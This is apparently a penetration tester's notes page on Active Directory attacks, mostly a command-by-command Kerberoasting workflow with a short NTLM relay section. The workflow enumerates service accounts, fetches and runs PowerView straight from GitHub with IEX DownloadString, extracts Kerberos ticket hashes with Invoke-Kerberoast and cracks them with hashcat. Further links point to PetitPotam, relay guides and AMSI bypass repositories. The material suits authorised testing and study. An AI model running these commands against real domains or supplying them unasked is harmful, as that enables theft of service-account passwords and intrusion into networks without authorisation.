TTPs for Active Directory attacks
Some notes
Kerberoasting
Kerberoasting is a type of attack that exploits the Kerberos authentication protocol used by Active Directory to request and extract Kerberos tickets for service accounts. These tickets can then be cracked offline to obtain the plaintext passwords for the service accounts. Kerberoasting is often used to target high-privilege service accounts that are not subject to password rotation policies.
Workflow
01 Get SPNs
Using AD Powershell Module
# Get accounts with SPN
(Get-ADUser -Filter {servicePrincipalName -like '*'} -Properties servicePrincipalName).servicePrincipalName
Using setspn.exe
This is a default command that comes with windows.
setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1
Using AD Searcher
$ADBaseDir = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://rootDSE").Get("defaultNamingContext")
# We use .NET here to connect to the Domain via LDAP
$LDAPFilter = "(&(!objectClass=computer)(servicePrincipalName=*))"
$DomainFQDN = "LDAP://$ADBaseDir"
$ADPropertiesToLoad = @("name", "samaccountname", "displayname", "serviceprincipalname", "serviceprincipalnames")
$Domain = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList
$DomainFQDN$ADSearcher = New-Object System.DirectoryServices.DirectorySearcher
$ADSearcher.SearchRoot = $Domain
$ADSearcher.PageSize = 10
$ADSearcher.Filter = $LDAPFilter
$ADSearcher.SearchScope = "Subtree"
ForEach ($prop in $ADPropertiesToLoad) {$ADSearcher.PropertiesToLoad.Add($prop)}
$Results = $ADSearcher.FindAll()
Using PowerView
# Launch shell as admin
# Load PowerSploit (host it in your own server of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Get-DomainUser -SPN
02. Request & Extract Roastable Kerberos Tickets
Using PowerView
# Launch shell as admin
# Load PowerSploit (host it in your own server of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Invoke-Kerberoast -OutputFormat Hashcat | % {$_.Hash} | Out-File 'C:\somewhere\spn_accounts_hashes.txt'
03. Crack Hashes with Hashcat
- A HashCat cheat sheet –> https://github.com/frizb/Hashcat-Cheatsheet
.\hashcat.exe -m 19700 -a 0 -w 2 --force --opencl-device-types 1,2 -O 'C:\spn_accounts_hashes.txt' D:\wordlists\rockyou.txt -r .\rules\OneRuleToRuleThemAll.rule
References
- The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
- Link to PowerView v3.0 tricks by HarmJ0y: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
- Repository. Great Kerberoast scripts (including some python ones) by Tim Medin: https://github.com/nidem/kerberoast
- Repository. All things hacky but especially some good AMSI bypasses: https://github.com/m0chan/h4cks
- Repository. Great repo by Scot Sutherland on PowerShell scripts for hacking (still actively maintained as at 2020): https://github.com/nullbind/Powershellery
- Article. How to attack Kerberos by M0chan: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
- Article. How to attack Kerberos by Tarlogic: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
- Article. Discovering SPNs: https://pentestlab.blog/2018/06/04/spn-discovery/
NTLM Relay
Using PetitPotam
The tool can be obtained here: https://github.com/topotam/PetitPotam/blob/main/Petitpotam.py (note, requires Impacket to be installed)
References
- Good practical guide: https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/ that shows how to run ntlmrelayx.py and set your Certificate Authority (CA) as a target.
- Guide using PayloadAllThethings: https://gitlab.com/pentest-tools/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#ad-cs-relay-attack
- Performing a similar attack with RemotePotato: https://github.com/antonioCoco/RemotePotato0
- Takeover via RBCD (Resource Based Constrained Delegation): https://gist.github.com/audibleblink/06916db2a76c7bd13400c4f9da422ad5
- Mitigations:
- https://threatpost.com/microsoft-petitpotam-poc/168163/